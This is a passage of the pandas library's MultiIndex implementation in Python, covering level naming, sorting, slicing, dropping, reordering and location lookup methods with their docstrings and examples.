case formatted = [ pprint_thing(na if isna(x) else x, escape_chars=("\t", "\r", "\n")) for x in algos.take_nd(lev._values, level_codes) ] stringified_levels.append(formatted) result_levels = [] for lev, lev_name in zip(stringified_levels, self.names): level = [] if names: level.append( pprint_thing(lev_name, escape_chars=("\t", "\r", "\n")) if lev_name is not None else "" ) level.extend(np.array(lev, dtype=object)) result_levels.append(level) if sparsify is None: sparsify = get_option("display.multi_sparse") if sparsify: sentinel = "" # GH3547 use value of sparsify as sentinel if it's "Falsey" assert isinstance(sparsify, bool) or sparsify is lib.no_default if sparsify in [False, lib.no_default]: sentinel = sparsify # little bit of a kludge job for #1217 result_levels = sparsify_labels( result_levels, start=int(names), sentinel=sentinel ) if adjoin: from pandas.io.formats.format import get_adjustment adj = get_adjustment() return adj.adjoin(space, *result_levels).split("\n") else: return result_levels # -------------------------------------------------------------------- # Names Methods def _get_names(self) -> FrozenList: return FrozenList(self._names) def _set_names(self, names, *, level=None, validate: bool = True): """ Set new names on index. Each name has to be a hashable type. Parameters ---------- values : str or sequence name(s) to set level : int, level name, or sequence of int/level names (default None) If the index is a MultiIndex (hierarchical), level(s) to set (None for all levels). Otherwise level must be None validate : bool, default True validate that the names match level lengths Raises ------ TypeError if each name is not hashable. Notes ----- sets names on levels. WARNING: mutates! Note that you generally want to set this *after* changing levels, so that it only acts on copies """ # GH 15110 # Don't allow a single string for names in a MultiIndex if names is not None and not is_list_like(names): raise ValueError("Names should be list-like for a MultiIndex") names = list(names) if validate: if level is not None and len(names) != len(level): raise ValueError("Length of names must match length of level.") if level is None and len(names) != self.nlevels: raise ValueError( "Length of names must match number of levels in MultiIndex." ) if level is None: level = range(self.nlevels) else: level = [self._get_level_number(lev) for lev in level] # set the name for lev, name in zip(level, names): if name is not None: # GH 20527 # All items in 'names' need to be hashable: if not is_hashable(name): raise TypeError( f"{type(self).__name__}.name must be a hashable type" ) # error: Cannot determine type of '__setitem__' self._names[lev] = name # type: ignore[has-type] # If .levels has been accessed, the names in our cache will be stale. self._reset_cache() names = property( fset=_set_names, fget=_get_names, doc=""" Names of levels in MultiIndex. Examples -------- >>> mi = pd.MultiIndex.from_arrays( ... [[1, 2], [3, 4], [5, 6]], names=['x', 'y', 'z']) >>> mi MultiIndex([(1, 3, 5), (2, 4, 6)], names=['x', 'y', 'z']) >>> mi.names FrozenList(['x', 'y', 'z']) """, ) # -------------------------------------------------------------------- @doc(Index._get_grouper_for_level) def _get_grouper_for_level(self, mapper, *, level): indexer = self.codes[level] level_index = self.levels[level] if mapper is not None: # Handle group mapping function and return level_values = self.levels[level].take(indexer) grouper = level_values.map(mapper) return grouper, None, None codes, uniques = algos.factorize(indexer, sort=True) if len(uniques) > 0 and uniques[0] == -1: # Handle NAs mask = indexer != -1 ok_codes, uniques = algos.factorize(indexer[mask], sort=True) codes = np.empty(len(indexer), dtype=indexer.dtype) codes[mask] = ok_codes codes[~mask] = -1 if len(uniques) < len(level_index): # Remove unobserved levels from level_index level_index = level_index.take(uniques) else: # break references back to us so that setting the name # on the output of a groupby doesn't reflect back here. level_index = level_index.copy() if level_index._can_hold_na: grouper = level_index.take(codes, fill_value=True) else: grouper = level_index.take(codes) return grouper, codes, level_index @cache_readonly def inferred_type(self) -> str: return "mixed" def _get_level_number(self, level) -> int: count = self.names.count(level) if (count > 1) and not is_integer(level): raise ValueError( f"The name {level} occurs multiple times, use a level number" ) try: level = self.names.index(level) except ValueError as err: if not is_integer(level): raise KeyError(f"Level {level} not found") from err elif level < 0: level += self.nlevels if level < 0: orig_level = level - self.nlevels raise IndexError( f"Too many levels: Index has only {self.nlevels} levels, " f"{orig_level} is not a valid level number" ) from err # Note: levels are zero-based elif level >= self.nlevels: raise IndexError( f"Too many levels: Index has only {self.nlevels} levels, " f"not {level + 1}" ) from err return level @property def _has_complex_internals(self) -> bool: # used to avoid libreduction code paths, which raise or require conversion return True @cache_readonly def is_monotonic_increasing(self) -> bool: """ return if the index is monotonic increasing (only equal or increasing) values. """ if any(-1 in code for code in self.codes): return False if all(level.is_monotonic for level in self.levels): # If each level is sorted, we can operate on the codes directly. GH27495 return libalgos.is_lexsorted( [x.astype("int64", copy=False) for x in self.codes] ) # reversed() because lexsort() wants the most significant key last. values = [ self._get_level_values(i)._values for i in reversed(range(len(self.levels))) ] try: sort_order = np.lexsort(values) return Index(sort_order).is_monotonic except TypeError: # we have mixed types and np.lexsort is not happy return Index(self._values).is_monotonic @cache_readonly def is_monotonic_decreasing(self) -> bool: """ return if the index is monotonic decreasing (only equal or decreasing) values. """ # monotonic decreasing if and only if reverse is monotonic increasing return self[::-1].is_monotonic_increasing @cache_readonly def _inferred_type_levels(self) -> list[str]: """return a list of the inferred types, one for each level""" return [i.inferred_type for i in self.levels] @doc(Index.duplicated) def duplicated(self, keep="first") -> npt.NDArray[np.bool_]: shape = tuple(len(lev) for lev in self.levels) ids = get_group_index(self.codes, shape, sort=False, xnull=False) return duplicated(ids, keep) # error: Cannot override final attribute "_duplicated" # (previously declared in base class "IndexOpsMixin") _duplicated = duplicated # type: ignore[misc] def fillna(self, value=None, downcast=None): """ fillna is not implemented for MultiIndex """ raise NotImplementedError("isna is not defined for MultiIndex") @doc(Index.dropna) def dropna(self, how: str = "any") -> MultiIndex: nans = [level_codes == -1 for level_codes in self.codes] if how == "any": indexer = np.any(nans, axis=0) elif how == "all": indexer = np.all(nans, axis=0) else: raise ValueError(f"invalid how option: {how}") new_codes = [level_codes[~indexer] for level_codes in self.codes] return self.set_codes(codes=new_codes) def _get_level_values(self, level: int, unique: bool = False) -> Index: """ Return vector of label values for requested level, equal to the length of the index **this is an internal method** Parameters ---------- level : int unique : bool, default False if True, drop duplicated values Returns ------- Index """ lev = self.levels[level] level_codes = self.codes[level] name = self._names[level] if unique: level_codes = algos.unique(level_codes) filled = algos.take_nd(lev._values, level_codes, fill_value=lev._na_value) return lev._shallow_copy(filled, name=name) def get_level_values(self, level): """ Return vector of label values for requested level. Length of returned vector is equal to the length of the index. Parameters ---------- level : int or str ``level`` is either the integer position of the level in the MultiIndex, or the name of the level. Returns ------- values : Index Values is a level of this MultiIndex converted to a single :class:`Index` (or subclass thereof). Examples -------- Create a MultiIndex: >>> mi = pd.MultiIndex.from_arrays((list('abc'), list('def'))) >>> mi.names = ['level_1', 'level_2'] Get level values by supplying level as either integer or name: >>> mi.get_level_values(0) Index(['a', 'b', 'c'], dtype='object', name='level_1') >>> mi.get_level_values('level_2') Index(['d', 'e', 'f'], dtype='object', name='level_2') """ level = self._get_level_number(level) values = self._get_level_values(level) return values @doc(Index.unique) def unique(self, level=None): if level is None: return super().unique() else: level = self._get_level_number(level) return self._get_level_values(level=level, unique=True) def to_frame(self, index: bool = True, name=None) -> DataFrame: """ Create a DataFrame with the levels of the MultiIndex as columns. Column ordering is determined by the DataFrame constructor with data as a dict. Parameters ---------- index : bool, default True Set the index of the returned DataFrame as the original MultiIndex. name : list / sequence of str, optional The passed names should substitute index level names. Returns ------- DataFrame : a DataFrame containing the original MultiIndex data. See Also -------- DataFrame : Two-dimensional, size-mutable, potentially heterogeneous tabular data. Examples -------- >>> mi = pd.MultiIndex.from_arrays([['a', 'b'], ['c', 'd']]) >>> mi MultiIndex([('a', 'c'), ('b', 'd')], ) >>> df = mi.to_frame() >>> df 0 1 a c a c b d b d >>> df = mi.to_frame(index=False) >>> df 0 1 0 a c 1 b d >>> df = mi.to_frame(name=['x', 'y']) >>> df x y a c a c b d b d """ from pandas import DataFrame if name is not None: if not is_list_like(name): raise TypeError("'name' must be a list / sequence of column names.") if len(name) != len(self.levels): raise ValueError( "'name' should have same length as number of levels on index." ) idx_names = name else: idx_names = self.names # Guarantee resulting column order - PY36+ dict maintains insertion order result = DataFrame( { (level if lvlname is None else lvlname): self._get_level_values(level) for lvlname, level in zip(idx_names, range(len(self.levels))) }, copy=False, ) if index: result.index = self return result def to_flat_index(self) -> Index: """ Convert a MultiIndex to an Index of Tuples containing the level values. Returns ------- pd.Index Index with the MultiIndex data represented in Tuples. See Also -------- MultiIndex.from_tuples : Convert flat index back to MultiIndex. Notes ----- This method will simply return the caller if called by anything other than a MultiIndex. Examples -------- >>> index = pd.MultiIndex.from_product( ... [['foo', 'bar'], ['baz', 'qux']], ... names=['a', 'b']) >>> index.to_flat_index() Index([('foo', 'baz'), ('foo', 'qux'), ('bar', 'baz'), ('bar', 'qux')], dtype='object') """ return Index(self._values, tupleize_cols=False) @property def _is_all_dates(self) -> bool: return False def is_lexsorted(self) -> bool: warnings.warn( "MultiIndex.is_lexsorted is deprecated as a public function, " "users should use MultiIndex.is_monotonic_increasing instead.", FutureWarning, stacklevel=2, ) return self._is_lexsorted() def _is_lexsorted(self) -> bool: """ Return True if the codes are lexicographically sorted. Returns ------- bool Examples -------- In the below examples, the first level of the MultiIndex is sorted because a<b<c, so there is no need to look at the next level. >>> pd.MultiIndex.from_arrays([['a', 'b', 'c'], ['d', 'e', 'f']]).is_lexsorted() True >>> pd.MultiIndex.from_arrays([['a', 'b', 'c'], ['d', 'f', 'e']]).is_lexsorted() True In case there is a tie, the lexicographical sorting looks at the next level of the MultiIndex. >>> pd.MultiIndex.from_arrays([[0, 1, 1], ['a', 'b', 'c']]).is_lexsorted() True >>> pd.MultiIndex.from_arrays([[0, 1, 1], ['a', 'c', 'b']]).is_lexsorted() False >>> pd.MultiIndex.from_arrays([['a', 'a', 'b', 'b'], ... ['aa', 'bb', 'aa', 'bb']]).is_lexsorted() True >>> pd.MultiIndex.from_arrays([['a', 'a', 'b', 'b'], ... ['bb', 'aa', 'aa', 'bb']]).is_lexsorted() False """ return self._lexsort_depth == self.nlevels @property def lexsort_depth(self) -> int: warnings.warn( "MultiIndex.is_lexsorted is deprecated as a public function, " "users should use MultiIndex.is_monotonic_increasing instead.", FutureWarning, stacklevel=2, ) return self._lexsort_depth @cache_readonly def _lexsort_depth(self) -> int: """ Compute and return the lexsort_depth, the number of levels of the MultiIndex that are sorted lexically Returns ------- int """ if self.sortorder is not None: return self.sortorder return _lexsort_depth(self.codes, self.nlevels) def _sort_levels_monotonic(self) -> MultiIndex: """ This is an *internal* function. Create a new MultiIndex from the current to monotonically sorted items IN the levels. This does not actually make the entire MultiIndex monotonic, JUST the levels. The resulting MultiIndex will have the same outward appearance, meaning the same .values and ordering. It will also be .equals() to the original. Returns ------- MultiIndex Examples -------- >>> mi = pd.MultiIndex(levels=[['a', 'b'], ['bb', 'aa']], ... codes=[[0, 0, 1, 1], [0, 1, 0, 1]]) >>> mi MultiIndex([('a', 'bb'), ('a', 'aa'), ('b', 'bb'), ('b', 'aa')], ) >>> mi.sort_values() MultiIndex([('a', 'aa'), ('a', 'bb'), ('b', 'aa'), ('b', 'bb')], ) """ if self._is_lexsorted() and self.is_monotonic: return self new_levels = [] new_codes = [] for lev, level_codes in zip(self.levels, self.codes): if not lev.is_monotonic: try: # indexer to reorder the levels indexer = lev.argsort() except TypeError: pass else: lev = lev.take(indexer) # indexer to reorder the level codes indexer = ensure_platform_int(indexer) ri = lib.get_reverse_indexer(indexer, len(indexer)) level_codes = algos.take_nd(ri, level_codes) new_levels.append(lev) new_codes.append(level_codes) return MultiIndex( new_levels, new_codes, names=self.names, sortorder=self.sortorder, verify_integrity=False, ) def remove_unused_levels(self) -> MultiIndex: """ Create new MultiIndex from current that removes unused levels. Unused level(s) means levels that are not expressed in the labels. The resulting MultiIndex will have the same outward appearance, meaning the same .values and ordering. It will also be .equals() to the original. Returns ------- MultiIndex Examples -------- >>> mi = pd.MultiIndex.from_product([range(2), list('ab')]) >>> mi MultiIndex([(0, 'a'), (0, 'b'), (1, 'a'), (1, 'b')], ) >>> mi[2:] MultiIndex([(1, 'a'), (1, 'b')], ) The 0 from the first level is not represented and can be removed >>> mi2 = mi[2:].remove_unused_levels() >>> mi2.levels FrozenList([[1], ['a', 'b']]) """ new_levels = [] new_codes = [] changed = False for lev, level_codes in zip(self.levels, self.codes): # Since few levels are typically unused, bincount() is more # efficient than unique() - however it only accepts positive values # (and drops order): uniques = np.where(np.bincount(level_codes + 1) > 0)[0] - 1 has_na = int(len(uniques) and (uniques[0] == -1)) if len(uniques) != len(lev) + has_na: if lev.isna().any() and len(uniques) == len(lev): break # We have unused levels changed = True # Recalculate uniques, now preserving order. # Can easily be cythonized by exploiting the already existing # "uniques" and stop parsing "level_codes" when all items # are found: uniques = algos.unique(level_codes) if has_na: na_idx = np.where(uniques == -1)[0] # Just ensure that -1 is in first position: uniques[[0, na_idx[0]]] = uniques[[na_idx[0], 0]] # codes get mapped from uniques to 0:len(uniques) # -1 (if present) is mapped to last position code_mapping = np.zeros(len(lev) + has_na) # ... and reassigned value -1: code_mapping[uniques] = np.arange(len(uniques)) - has_na level_codes = code_mapping[level_codes] # new levels are simple lev = lev.take(uniques[has_na:]) new_levels.append(lev) new_codes.append(level_codes) result = self.view() if changed: result._reset_identity() result._set_levels(new_levels, validate=False) result._set_codes(new_codes, validate=False) return result # -------------------------------------------------------------------- # Pickling Methods def __reduce__(self): """Necessary for making this object picklable""" d = { "levels": list(self.levels), "codes": list(self.codes), "sortorder": self.sortorder, "names": list(self.names), } return ibase._new_Index, (type(self), d), None # -------------------------------------------------------------------- def __getitem__(self, key): if is_scalar(key): key = com.cast_scalar_indexer(key, warn_float=True) retval = [] for lev, level_codes in zip(self.levels, self.codes): if level_codes[key] == -1: retval.append(np.nan) else: retval.append(lev[level_codes[key]]) return tuple(retval) else: # in general cannot be sure whether the result will be sorted sortorder = None if com.is_bool_indexer(key): key = np.asarray(key, dtype=bool) sortorder = self.sortorder elif isinstance(key, slice): if key.step is None or key.step > 0: sortorder = self.sortorder elif isinstance(key, Index): key = np.asarray(key) new_codes = [level_codes[key] for level_codes in self.codes] return MultiIndex( levels=self.levels, codes=new_codes, names=self.names, sortorder=sortorder, verify_integrity=False, ) def _getitem_slice(self: MultiIndex, slobj: slice) -> MultiIndex: """ Fastpath for __getitem__ when we know we have a slice. """ sortorder = None if slobj.step is None or slobj.step > 0: sortorder = self.sortorder new_codes = [level_codes[slobj] for level_codes in self.codes] return type(self)( levels=self.levels, codes=new_codes, names=self._names, sortorder=sortorder, verify_integrity=False, ) @Appender(_index_shared_docs["take"] % _index_doc_kwargs) def take( self: MultiIndex, indices, axis: int = 0, allow_fill: bool = True, fill_value=None, **kwargs, ) -> MultiIndex: nv.validate_take((), kwargs) indices = ensure_platform_int(indices) # only fill if we are passing a non-None fill_value allow_fill = self._maybe_disallow_fill(allow_fill, fill_value, indices) na_value = -1 taken = [lab.take(indices) for lab in self.codes] if allow_fill: mask = indices == -1 if mask.any(): masked = [] for new_label in taken: label_values = new_label label_values[mask] = na_value masked.append(np.asarray(label_values)) taken = masked return MultiIndex( levels=self.levels, codes=taken, names=self.names, verify_integrity=False ) def append(self, other): """ Append a collection of Index options together Parameters ---------- other : Index or list/tuple of indices Returns ------- appended : Index """ if not isinstance(other, (list, tuple)): other = [other] if all( (isinstance(o, MultiIndex) and o.nlevels >= self.nlevels) for o in other ): arrays = [] for i in range(self.nlevels): label = self._get_level_values(i) appended = [o._get_level_values(i) for o in other] arrays.append(label.append(appended)) return MultiIndex.from_arrays(arrays, names=self.names) to_concat = (self._values,) + tuple(k._values for k in other) new_tuples = np.concatenate(to_concat) # if all(isinstance(x, MultiIndex) for x in other): try: return MultiIndex.from_tuples(new_tuples, names=self.names) except (TypeError, IndexError): return Index._with_infer(new_tuples) def argsort(self, *args, **kwargs) -> npt.NDArray[np.intp]: return self._values.argsort(*args, **kwargs) @Appender(_index_shared_docs["repeat"] % _index_doc_kwargs) def repeat(self, repeats: int, axis=None) -> MultiIndex: nv.validate_repeat((), {"axis": axis}) # error: Incompatible types in assignment (expression has type "ndarray", # variable has type "int") repeats = ensure_platform_int(repeats) # type: ignore[assignment] return MultiIndex( levels=self.levels, codes=[ level_codes.view(np.ndarray).astype(np.intp).repeat(repeats) for level_codes in self.codes ], names=self.names, sortorder=self.sortorder, verify_integrity=False, ) def drop(self, codes, level=None, errors="raise"): """ Make new MultiIndex with passed list of codes deleted Parameters ---------- codes : array-like Must be a list of tuples when level is not specified level : int or level name, default None errors : str, default 'raise' Returns ------- dropped : MultiIndex """ if level is not None: return self._drop_from_level(codes, level, errors) if not isinstance(codes, (np.ndarray, Index)): try: codes = com.index_labels_to_array(codes, dtype=np.dtype("object")) except ValueError: pass inds = [] for level_codes in codes: try: loc = self.get_loc(level_codes) # get_loc returns either an integer, a slice, or a boolean # mask if isinstance(loc, int): inds.append(loc) elif isinstance(loc, slice): step = loc.step if loc.step is not None else 1 inds.extend(range(loc.start, loc.stop, step)) elif com.is_bool_indexer(loc): if self._lexsort_depth == 0: warnings.warn( "dropping on a non-lexsorted multi-index " "without a level parameter may impact performance.", PerformanceWarning, stacklevel=3, ) loc = loc.nonzero()[0] inds.extend(loc) else: msg = f"unsupported indexer of type {type(loc)}" raise AssertionError(msg) except KeyError: if errors != "ignore": raise return self.delete(inds) def _drop_from_level(self, codes, level, errors="raise") -> MultiIndex: codes = com.index_labels_to_array(codes) i = self._get_level_number(level) index = self.levels[i] values = index.get_indexer(codes) # If nan should be dropped it will equal -1 here. We have to check which values # are not nan and equal -1, this means they are missing in the index nan_codes = isna(codes) values[(np.equal(nan_codes, False)) & (values == -1)] = -2 if index.shape[0] == self.shape[0]: values[np.equal(nan_codes, True)] = -2 not_found = codes[values == -2] if len(not_found) != 0 and errors != "ignore": raise KeyError(f"labels {not_found} not found in level") mask = ~algos.isin(self.codes[i], values) return self[mask] def swaplevel(self, i=-2, j=-1) -> MultiIndex: """ Swap level i with level j. Calling this method does not change the ordering of the values. Parameters ---------- i : int, str, default -2 First level of index to be swapped. Can pass level name as string. Type of parameters can be mixed. j : int, str, default -1 Second level of index to be swapped. Can pass level name as string. Type of parameters can be mixed. Returns ------- MultiIndex A new MultiIndex. See Also -------- Series.swaplevel : Swap levels i and j in a MultiIndex. Dataframe.swaplevel : Swap levels i and j in a MultiIndex on a particular axis. Examples -------- >>> mi = pd.MultiIndex(levels=[['a', 'b'], ['bb', 'aa']], ... codes=[[0, 0, 1, 1], [0, 1, 0, 1]]) >>> mi MultiIndex([('a', 'bb'), ('a', 'aa'), ('b', 'bb'), ('b', 'aa')], ) >>> mi.swaplevel(0, 1) MultiIndex([('bb', 'a'), ('aa', 'a'), ('bb', 'b'), ('aa', 'b')], ) """ new_levels = list(self.levels) new_codes = list(self.codes) new_names = list(self.names) i = self._get_level_number(i) j = self._get_level_number(j) new_levels[i], new_levels[j] = new_levels[j], new_levels[i] new_codes[i], new_codes[j] = new_codes[j], new_codes[i] new_names[i], new_names[j] = new_names[j], new_names[i] return MultiIndex( levels=new_levels, codes=new_codes, names=new_names, verify_integrity=False ) def reorder_levels(self, order) -> MultiIndex: """ Rearrange levels using input order. May not drop or duplicate levels. Parameters ---------- order : list of int or list of str List representing new level order. Reference level by number (position) or by key (label). Returns ------- MultiIndex Examples -------- >>> mi = pd.MultiIndex.from_arrays([[1, 2], [3, 4]], names=['x', 'y']) >>> mi MultiIndex([(1, 3), (2, 4)], names=['x', 'y']) >>> mi.reorder_levels(order=[1, 0]) MultiIndex([(3, 1), (4, 2)], names=['y', 'x']) >>> mi.reorder_levels(order=['y', 'x']) MultiIndex([(3, 1), (4, 2)], names=['y', 'x']) """ order = [self._get_level_number(i) for i in order] if len(order) != self.nlevels: raise AssertionError( f"Length of order must be same as number of levels ({self.nlevels}), " f"got {len(order)}" ) new_levels = [self.levels[i] for i in order] new_codes = [self.codes[i] for i in order] new_names = [self.names[i] for i in order] return MultiIndex( levels=new_levels, codes=new_codes, names=new_names, verify_integrity=False ) def _get_codes_for_sorting(self) -> list[Categorical]: """ we are categorizing our codes by using the available categories (all, not just observed) excluding any missing ones (-1); this is in preparation for sorting, where we need to disambiguate that -1 is not a valid valid """ def cats(level_codes): return np.arange( np.array(level_codes).max() + 1 if len(level_codes) else 0, dtype=level_codes.dtype, ) return [ Categorical.from_codes(level_codes, cats(level_codes), ordered=True) for level_codes in self.codes ] def sortlevel( self, level=0, ascending: bool = True, sort_remaining: bool = True ) -> tuple[MultiIndex, npt.NDArray[np.intp]]: """ Sort MultiIndex at the requested level. The result will respect the original ordering of the associated factor at that level. Parameters ---------- level : list-like, int or str, default 0 If a string is given, must be a name of the level. If list-like must be names or ints of levels. ascending : bool, default True False to sort in descending order. Can also be a list to specify a directed ordering. sort_remaining : sort by the remaining levels after level Returns ------- sorted_index : pd.MultiIndex Resulting index. indexer : np.ndarray[np.intp] Indices of output values in original index. Examples -------- >>> mi = pd.MultiIndex.from_arrays([[0, 0], [2, 1]]) >>> mi MultiIndex([(0, 2), (0, 1)], ) >>> mi.sortlevel() (MultiIndex([(0, 1), (0, 2)], ), array([1, 0])) >>> mi.sortlevel(sort_remaining=False) (MultiIndex([(0, 2), (0, 1)], ), array([0, 1])) >>> mi.sortlevel(1) (MultiIndex([(0, 1), (0, 2)], ), array([1, 0])) >>> mi.sortlevel(1, ascending=False) (MultiIndex([(0, 2), (0, 1)], ), array([0, 1])) """ if isinstance(level, (str, int)): level = [level] level = [self._get_level_number(lev) for lev in level] sortorder = None # we have a directed ordering via ascending if isinstance(ascending, list): if not len(level) == len(ascending): raise ValueError("level must have same length as ascending") indexer = lexsort_indexer( [self.codes[lev] for lev in level], orders=ascending ) # level ordering else: codes = list(self.codes) shape = list(self.levshape) # partition codes and shape primary = tuple(codes[lev] for lev in level) primshp = tuple(shape[lev] for lev in level) # Reverse sorted to retain the order of # smaller indices that needs to be removed for lev in sorted(level, reverse=True): codes.pop(lev) shape.pop(lev) if sort_remaining: primary += primary + tuple(codes) primshp += primshp + tuple(shape) else: sortorder = level[0] indexer = indexer_from_factorized(primary, primshp, compress=False) if not ascending: indexer = indexer[::-1] indexer = ensure_platform_int(indexer) new_codes = [level_codes.take(indexer) for level_codes in self.codes] new_index = MultiIndex( codes=new_codes, levels=self.levels, names=self.names, sortorder=sortorder, verify_integrity=False, ) return new_index, indexer def _wrap_reindex_result(self, target, indexer, preserve_names: bool): if not isinstance(target, MultiIndex): if indexer is None: target = self elif (indexer >= 0).all(): target = self.take(indexer) else: try: target = MultiIndex.from_tuples(target) except TypeError: # not all tuples, see test_constructor_dict_multiindex_reindex_flat return target target = self._maybe_preserve_names(target, preserve_names) return target def _maybe_preserve_names(self, target: Index, preserve_names: bool) -> Index: if ( preserve_names and target.nlevels == self.nlevels and target.names != self.names ): target = target.copy(deep=False) target.names = self.names return target # -------------------------------------------------------------------- # Indexing Methods def _check_indexing_error(self, key) -> None: if not is_hashable(key) or is_iterator(key): # We allow tuples if they are hashable, whereas other Index # subclasses require scalar. # We have to explicitly exclude generators, as these are hashable. raise InvalidIndexError(key) @cache_readonly def _should_fallback_to_positional(self) -> bool: """ Should integer key(s) be treated as positional? """ # GH#33355 return self.levels[0]._should_fallback_to_positional def _get_values_for_loc(self, series: Series, loc, key): """ Do a positional lookup on the given Series, returning either a scalar or a Series. Assumes that `series.index is self` """ new_values = series._values[loc] if is_scalar(loc): return new_values if len(new_values) == 1 and not self.nlevels > 1: # If more than one level left, we can not return a scalar return new_values[0] new_index = self[loc] new_index = maybe_droplevels(new_index, key) new_ser = series._constructor(new_values, index=new_index, name=series.name) return new_ser.__finalize__(series) def _get_indexer_strict( self, key, axis_name: str ) -> tuple[Index, npt.NDArray[np.intp]]: keyarr = key if not isinstance(keyarr, Index): keyarr = com.asarray_tuplesafe(keyarr) if len(keyarr) and not isinstance(keyarr[0], tuple): indexer = self._get_indexer_level_0(keyarr) self._raise_if_missing(key, indexer, axis_name) return self[indexer], indexer return super()._get_indexer_strict(key, axis_name) def _raise_if_missing(self, key, indexer, axis_name: str) -> None: keyarr = key if not isinstance(key, Index): keyarr = com.asarray_tuplesafe(key) if len(keyarr) and not isinstance(keyarr[0], tuple): # i.e. same condition for special case in MultiIndex._get_indexer_strict mask = indexer == -1 if mask.any(): check = self.levels[0].get_indexer(keyarr) cmask = check == -1 if cmask.any(): raise KeyError(f"{keyarr[cmask]} not in index") # We get here when levels still contain values which are not # actually in Index anymore raise KeyError(f"{keyarr} not in index") else: return super()._raise_if_missing(key, indexer, axis_name) def _get_indexer_level_0(self, target) -> npt.NDArray[np.intp]: """ Optimized equivalent to `self.get_level_values(0).get_indexer_for(target)`. """ lev = self.levels[0] codes = self._codes[0] cat = Categorical.from_codes(codes=codes, categories=lev) ci = Index(cat) return ci.get_indexer_for(target) def get_slice_bound( self, label: Hashable | Sequence[Hashable], side: str, kind=lib.no_default ) -> int: """ For an ordered MultiIndex, compute slice bound that corresponds to given label. Returns leftmost (one-past-the-rightmost if `side=='right') position of given label. Parameters ---------- label : object or tuple of objects side : {'left', 'right'} kind : {'loc', 'getitem', None} .. deprecated:: 1.4.0 Returns ------- int Index of label. Notes ----- This method only works if level 0 index of the MultiIndex is lexsorted. Examples -------- >>> mi = pd.MultiIndex.from_arrays([list('abbc'), list('gefd')]) Get the locations from the leftmost 'b' in the first level until the end of the multiindex: >>> mi.get_slice_bound('b', side="left") 1 Like above, but if you get the locations from the rightmost 'b' in the first level and 'f' in the second level: >>> mi.get_slice_bound(('b','f'), side="right") 3 See Also -------- MultiIndex.get_loc : Get location for a label or a tuple of labels. MultiIndex.get_locs : Get location for a label/slice/list/mask or a sequence of such. """ self._deprecated_arg(kind, "kind", "get_slice_bound") if not isinstance(label, tuple): label = (label,) return self._partial_tup_index(label, side=side) def slice_locs( self, start=None, end=None, step=None, kind=lib.no_default ) -> tuple[int, int]: """ For an ordered MultiIndex, compute the slice locations for input labels. The input labels can be tuples representing partial levels, e.g. for a MultiIndex with 3 levels, you can pass a single value (corresponding to the first level), or a 1-, 2-, or 3-tuple. Parameters ---------- start : label or tuple, default None If None, defaults to the beginning end : label or tuple If None, defaults to the end step : int or None Slice step kind : string, optional, defaults None .. deprecated:: 1.4.0 Returns ------- (start, end) : (int, int) Notes ----- This method only works if the MultiIndex is properly lexsorted. So, if only the first 2 levels of a 3-level MultiIndex are lexsorted, you can only pass two levels to ``.slice_locs``. Examples -------- >>> mi = pd.MultiIndex.from_arrays([list('abbd'), list('deff')], ... names=['A', 'B']) Get the slice locations from the beginning of 'b' in the first level until the end of the multiindex: >>> mi.slice_locs(start='b') (1, 4) Like above, but stop at the end of 'b' in the first level and 'f' in the second level: >>> mi.slice_locs(start='b', end=('b', 'f')) (1, 3) See Also -------- MultiIndex.get_loc : Get location for a label or a tuple of labels. MultiIndex.get_locs : Get location for a label/slice/list/mask or a sequence of such. """ self._deprecated_arg(kind, "kind", "slice_locs") # This function adds nothing to its parent implementation (the magic # happens in get_slice_bound method), but it adds meaningful doc. return super().slice_locs(start, end, step) def _partial_tup_index(self, tup: tuple, side="left"): if len(tup) > self._lexsort_depth: raise UnsortedIndexError( f"Key length ({len(tup)}) was greater than MultiIndex lexsort depth " f"({self._lexsort_depth})" ) n = len(tup) start, end = 0, len(self) zipped = zip(tup, self.levels, self.codes) for k, (lab, lev, level_codes) in enumerate(zipped): section = level_codes[start:end] if lab not in lev and not isna(lab): # short circuit try: loc = lev.searchsorted(lab, side=side) except TypeError as err: # non-comparable e.g. test_slice_locs_with_type_mismatch raise TypeError(f"Level type mismatch: {lab}") from err if not is_integer(loc): # non-comparable level, e.g. test_groupby_example raise TypeError(f"Level type mismatch: {lab}") if side == "right" and loc >= 0: loc -= 1 return start + section.searchsorted(loc, side=side) idx = self._get_loc_single_level_index(lev, lab) if isinstance(idx, slice) and k < n - 1: # Get start and end value from slice, necessary when a non-integer # interval is given as input GH#37707 start = idx.start end = idx.stop elif k < n - 1: end = start + section.searchsorted(idx, side="right") start = start + section.searchsorted(idx, side="left") elif isinstance(idx, slice): idx = idx.start return start + section.searchsorted(idx, side=side) else: return start + section.searchsorted(idx, side=side) def _get_loc_single_level_index(self, level_index: Index, key: Hashable) -> int: """ If key is NA value, location of index unify as -1. Parameters ---------- level_index: Index key : label Returns ------- loc : int If key is NA value, loc is -1 Else, location of key in index. See Also -------- Index.get_loc : The get_loc method for (single-level) index. """ if is_scalar(key) and isna(key): return -1 else: return level_index.get_loc(key) def get_loc(self, key, method=None): """ Get location for a label or a tuple of labels. The location is returned as an integer/slice or boolean mask. Parameters ---------- key : label or tuple of labels (one for each level) method : None Returns ------- loc : int, slice object or boolean mask If the key is past the lexsort depth, the return may be a boolean mask array, otherwise it is always a slice or int. See Also -------- Index.get_loc : The get_loc method for (single-level) index. MultiIndex.slice_locs : Get slice location given start label(s) and end label(s). MultiIndex.get_locs : Get location for a label/slice/list/mask or a sequence of such. Notes ----- The key cannot be a slice, list of same-level labels, a boolean mask, or a sequence of such. If you want to use those, use :meth:`MultiIndex.get_locs` instead. Examples -------- >>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')]) >>> mi.get_loc('b') slice(1, 3, None) >>> mi.get_loc(('b', 'e')) 1 """ if method is not None: raise NotImplementedError( "only the default get_loc method is " "currently supported for MultiIndex" ) hash(key) def _maybe_to_slice(loc): """convert integer indexer to boolean mask or slice if possible""" if not isinstance(loc, np.ndarray) or loc.dtype != np.intp: return loc loc = lib.maybe_indices_to_slice(loc, len(self)) if isinstance(loc, slice): return loc mask = np.empty(len(self), dtype="bool") mask.fill(False) mask[loc] = True return mask if not isinstance(key, tuple): loc = self._get_level_indexer(key, level=0) return _maybe_to_slice(loc) keylen = len(key) if self.nlevels < keylen: raise KeyError( f"Key length ({keylen}) exceeds index depth ({self.nlevels})" ) if keylen == self.nlevels and self.is_unique: try: return self._engine.get_loc(key) except TypeError: # e.g. test_partial_slicing_with_multiindex partial string slicing loc, _ = self.get_loc_level(key, list(range(self.nlevels))) return loc # -- partial selection or non-unique index # break the key into 2 parts based on the lexsort_depth of the index; # the first part returns a continuous slice 